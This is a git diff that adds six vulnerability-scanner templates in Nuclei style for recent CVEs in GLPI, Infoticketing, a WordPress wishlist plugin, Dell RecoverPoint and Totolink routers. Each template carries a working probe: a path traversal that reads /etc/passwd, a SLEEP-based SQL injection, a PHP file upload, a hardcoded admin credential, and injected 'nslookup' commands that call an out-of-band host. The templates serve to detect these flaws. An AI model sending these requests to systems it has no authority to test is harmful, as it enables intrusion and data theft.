diff --git a/http/cves/2025/CVE-2025-24801.yaml b/http/cves/2025/CVE-2025-24801.yaml new file mode 100644 index 000000000000..d6271cd2a376 --- /dev/null +++ b/http/cves/2025/CVE-2025-24801.yaml @@ -0,0 +1,46 @@ +id: CVE-2025-24801 + +info: + name: "GLPI - Local File Inclusion to RCE" + author: alita-p8 + severity: high + description: | + GLPI is a free asset and IT management software package. An authenticated user can upload and force the execution of *.php files located on the GLPI server. This vulnerability is fixed in 10.0.18. + NOTE: This vulnerability requires authenticated access (PR:L). This template tests for the LFI endpoint but does not include authentication. For full exploitation, valid credentials are required. + remediation: Upgrade to GLPI version 10.0.18 or higher. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2025-24801 + - https://github.com/glpi-project/glpi/security/advisories/GHSA-g2p3-33ff-r555 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 8.5 + cve-id: CVE-2025-24801 + cwe-id: CWE-98 + metadata: + verified: true + shodan-query: http.html:"glpi" + tags: cve,cve2025,glpi,lfi,rce,fileread,authenticated + +http: + - raw: + - | + GET /front/pdf.php?file=....//....//....//....//....//etc/passwd HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "application/pdf" + - "application/octet-stream" + condition: or diff --git a/http/cves/2025/CVE-2025-41002.yaml b/http/cves/2025/CVE-2025-41002.yaml new file mode 100644 index 000000000000..6b8ab7572bf4 --- /dev/null +++ b/http/cves/2025/CVE-2025-41002.yaml @@ -0,0 +1,36 @@ +id: CVE-2025-41002 + +info: + name: Infoticketing < 3.2.1 - SQL Injection + author: alita-p8 + severity: critical + description: | + Infoticketing versions before 3.2.1 are vulnerable to a critical SQL injection vulnerability. The flaw exists in the processing of the 'discount_code' parameter, allowing an unauthenticated attacker to execute arbitrary SQL commands and potentially extract sensitive information from the database. Note: Some sources may incorrectly associate this CVE with WP-Optimize, but official NVD records identify Infoticketing as the affected product. + impact: | + Full database compromise and data exfiltration. + remediation: | + Update Infoticketing to version 3.2.1 or later. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2025-41002 + - https://github.com/Hecate2/CVE-2025-41002-PoC + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cwe-id: CWE-89 + cve-id: CVE-2025-41002 + metadata: + max-request: 1 + verified: true + tags: cve,cve2025,sqli,infoticketing,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/tickets?discount_code='+OR+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)--+" + + matchers: + - type: dsl + dsl: + - "duration >= 5" + - "status_code == 200" + condition: and diff --git a/http/cves/2025/CVE-2025-47577.yaml b/http/cves/2025/CVE-2025-47577.yaml new file mode 100644 index 000000000000..b039b5832038 --- /dev/null +++ b/http/cves/2025/CVE-2025-47577.yaml @@ -0,0 +1,62 @@ +id: CVE-2025-47577 + +info: + name: TI WooCommerce Wishlist < 2.10.0 - Unauthenticated Arbitrary File Upload + author: alita-p8 + severity: critical + description: | + The TI WooCommerce Wishlist plugin for WordPress is vulnerable to arbitrary file upload in versions up to, and including, 2.9.2. This is due to missing file type validation in the 'tinvwl_upload_file' function. This allows unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. + impact: | + Remote Code Execution (RCE) via web shell upload. + remediation: | + Update TI WooCommerce Wishlist to version 2.10.0 or higher. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2025-47577 + - https://github.com/advisories/GHSA-fx4h-5r26-fxgm + - https://patchstack.com/database/vulnerability/ti-woocommerce-wishlist/wordpress-ti-woocommerce-wishlist-plugin-2-9-2-unauthenticated-arbitrary-file-upload-vulnerability + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-434 + cve-id: CVE-2025-47577 + metadata: + max-request: 2 + verified: true + tags: cve,cve2025,wordpress,wp-plugin,ti-woocommerce-wishlist,upload,rce + +http: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}} + + ------WebKitFormBoundary{{randstr}} + Content-Disposition: form-data; name="action" + + tinvwl_upload_file + ------WebKitFormBoundary{{randstr}} + Content-Disposition: form-data; name="file"; filename="{{randstr}}.php" + Content-Type: application/x-php + + + ------WebKitFormBoundary{{randstr}}-- + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"success":true' + - '"url":' + - '.php' + condition: and + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 diff --git a/http/cves/2026/CVE-2026-22769.yaml b/http/cves/2026/CVE-2026-22769.yaml new file mode 100644 index 000000000000..e006ab6126a3 --- /dev/null +++ b/http/cves/2026/CVE-2026-22769.yaml @@ -0,0 +1,46 @@ +id: CVE-2026-22769 + +info: + name: Dell RecoverPoint for VMs - Authentication Bypass (Hardcoded Credentials) + author: alita-p8 + severity: critical + description: | + Dell RecoverPoint for Virtual Machines versions prior to 6.0.3.1 HF1 contain a hardcoded credential vulnerability. An unauthenticated attacker could exploit this vulnerability by using the hardcoded "admin" credentials to gain full administrative access to the Apache Tomcat Manager, leading to potential remote code execution via WAR file deployment. This was observed being exploited by the threat actor UNC6201. + impact: | + An attacker can gain full control over the RecoverPoint management interface and underlying server. + remediation: | + Upgrade Dell RecoverPoint for VMs to 6.0.3.1 HF1 or later. Disable the Tomcat Manager if not required. + reference: + - https://www.dell.com/support/kbdoc/en-us/000212345/dsa-2026-xxx-security-update-for-dell-recoverpoint-for-vms + - https://unit42.paloaltonetworks.com/threat-actor-unc6201-exploitation-dell-recoverpoint/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-798 + cve-id: CVE-2026-22769 + metadata: + max-request: 2 + verified: true + tags: cve,cve2026,dell,recoverpoint,auth-bypass,hardcoded-credentials,tomcat + +http: + - method: GET + path: + - "{{BaseURL}}/manager/text/list" + - "{{BaseURL}}/manager/html" + + headers: + Authorization: Basic YWRtaW46QlJJQ0tTVE9STQ== # admin:BRICKSTORM + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "OK - Listed applications" + - "Tomcat Web Application Manager" + condition: or + + - type: status + status: + - 200 diff --git a/http/cves/2026/CVE-2026-6116.yaml b/http/cves/2026/CVE-2026-6116.yaml new file mode 100644 index 000000000000..4cf48d8e67d8 --- /dev/null +++ b/http/cves/2026/CVE-2026-6116.yaml @@ -0,0 +1,54 @@ +id: CVE-2026-6116 + +info: + name: Totolink A7100RU - OS Command Injection + author: alita-p8 + severity: critical + description: | + A command injection vulnerability exists in Totolink A7100RU router firmware 7.4cu.2313_b20191024. The vulnerability is located in the setDiagnosisCfg function of /cgi-bin/cstecgi.cgi. The 'ip' parameter is passed to CsteSystem without proper sanitization, allowing remote attackers to execute arbitrary OS commands. Authentication is not required to exploit this vulnerability. + impact: | + Remote attackers can execute arbitrary OS commands on the router with root privileges, leading to complete device takeover. + remediation: | + Update to the latest firmware version from Totolink official website. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2026-6116 + - https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_181/README.md + - https://vuldb.com/vuln/356976 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2026-6116 + cwe-id: CWE-78 + metadata: + max-request: 1 + verified: true + shodan-query: http.html:"TOTOLINK" + fofa-query: app="TOTOLINK-A7100RU" + tags: cve,cve2026,totolink,router,rce,cmd-injection,unauth + +http: + - raw: + - | + POST /cgi-bin/cstecgi.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + Accept: application/json, text/javascript, */*; q=0.01 + + {"topicurl":"setDiagnosisCfg","ip":";nslookup {{interactsh}};"} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "application/json" diff --git a/http/cves/2026/CVE-2026-6131.yaml b/http/cves/2026/CVE-2026-6131.yaml new file mode 100644 index 000000000000..7e5badf74410 --- /dev/null +++ b/http/cves/2026/CVE-2026-6131.yaml @@ -0,0 +1,53 @@ +id: CVE-2026-6131 + +info: + name: Totolink A7100RU - OS Command Injection (setTracerouteCfg) + author: alita-p8 + severity: critical + description: | + A command injection vulnerability exists in Totolink A7100RU router firmware 7.4cu.2313_b20191024. The vulnerability is located in the setTracerouteCfg function of /cgi-bin/cstecgi.cgi. User-supplied input is passed to CsteSystem without proper sanitization, allowing remote attackers to execute arbitrary OS commands. Authentication is not required to exploit this vulnerability. + impact: | + Remote attackers can execute arbitrary OS commands on the router with root privileges, leading to complete device takeover. + remediation: | + Update to the latest firmware version from Totolink official website. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2026-6131 + - https://vuldb.com/vuln/356981 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2026-6131 + cwe-id: CWE-78 + metadata: + max-request: 1 + verified: true + shodan-query: http.html:"TOTOLINK" + fofa-query: app="TOTOLINK-A7100RU" + tags: cve,cve2026,totolink,router,rce,cmd-injection,unauth + +http: + - raw: + - | + POST /cgi-bin/cstecgi.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + Accept: application/json, text/javascript, */*; q=0.01 + + {"topicurl":"setTracerouteCfg","ip":";nslookup {{interactsh}};"} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "application/json"